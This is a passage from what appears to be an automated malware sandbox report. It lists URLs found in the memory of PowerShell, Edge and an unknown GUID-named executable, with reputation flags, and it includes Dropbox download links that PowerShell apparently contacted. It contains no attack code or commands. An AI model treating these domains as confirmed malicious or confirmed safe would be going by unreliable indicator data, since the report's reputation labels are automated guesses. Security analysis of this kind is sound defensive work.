                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.dropbox.compowershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000003.00000002.2474347673.000002E15D460000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://paper.dropbox.com/cloud-docs/editpowershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://23glcrtmzxqgwfpq3oujitt.npowershell.exe, 00000016.00000002.2613958790.000001A0A525A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://app.hellosign.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.compowershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.dropbox.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.compowershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.compowershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.docsend.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://permanently-removed.invalid/LogoutYxABzenmsedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2465180795.000002E155020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.com/cd/0/get/CgjThj9J4LYCxQ4m9781PB-i6DM8powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://edge-block-www-env.dropbox-dns.compowershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.dropboxstatic.com/static/powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://officeapps-df.live.compowershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://api.login.yahoo.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://office.net/msedge.exe, 0000001C.00000002.2499091126.0000533000300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2436196063.000002E144FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A3BA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://login.yahoo.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.dropbox.com/playlist/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://onedrive.live.com/pickerpowershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E146BE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E146F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.dropbox.compowershell.exe, 00000003.00000002.2436196063.000002E145366000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A409E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.dropbox.com/scl/fi/uXpowershell.exe, 00000016.00000002.2613958790.000001A0A4022000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2436196063.000002E1451D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2436196063.000002E1451D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://chrome.google.com/webstoremsedge.exe, 0000000A.00000002.2425663714.00002CFC0000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.2498672218.0000533000188000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://go.micropowershell.exe, 00000003.00000002.2436196063.000002E1460F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14594B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A409E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://permanently-removed.invalid/oauth/multiloginmsedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.2465180795.000002E155020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.compowershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://crl.ver)svchost.exe, 0000000C.00000002.3422478105.0000014A52A00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://permanently-removed.invalid/oauth2/v1/userinfomsedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.symauth.com/cps0(148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.dropbox.com/v/s/playlist/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www-env.dropbox-dns.compowershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://permanently-removed.invalid/OAuthLoginmsedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2436196063.000002E1451D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://docs.sandbox.google.com/document/fsip/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000000C.00000003.2321523303.0000014A528AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com/cd/0/get/CggZQ6MA92jkJFVNQulAFQPZ1Z-Ppowershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://help.dropbox.com/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://msn.cn/msedge.exe, 0000001C.00000002.2499091126.0000533000300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://docs.google.com/presentation/fsip/powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://canny.io/sdk.jspowershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.symauth.com/rpa00148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                                		high
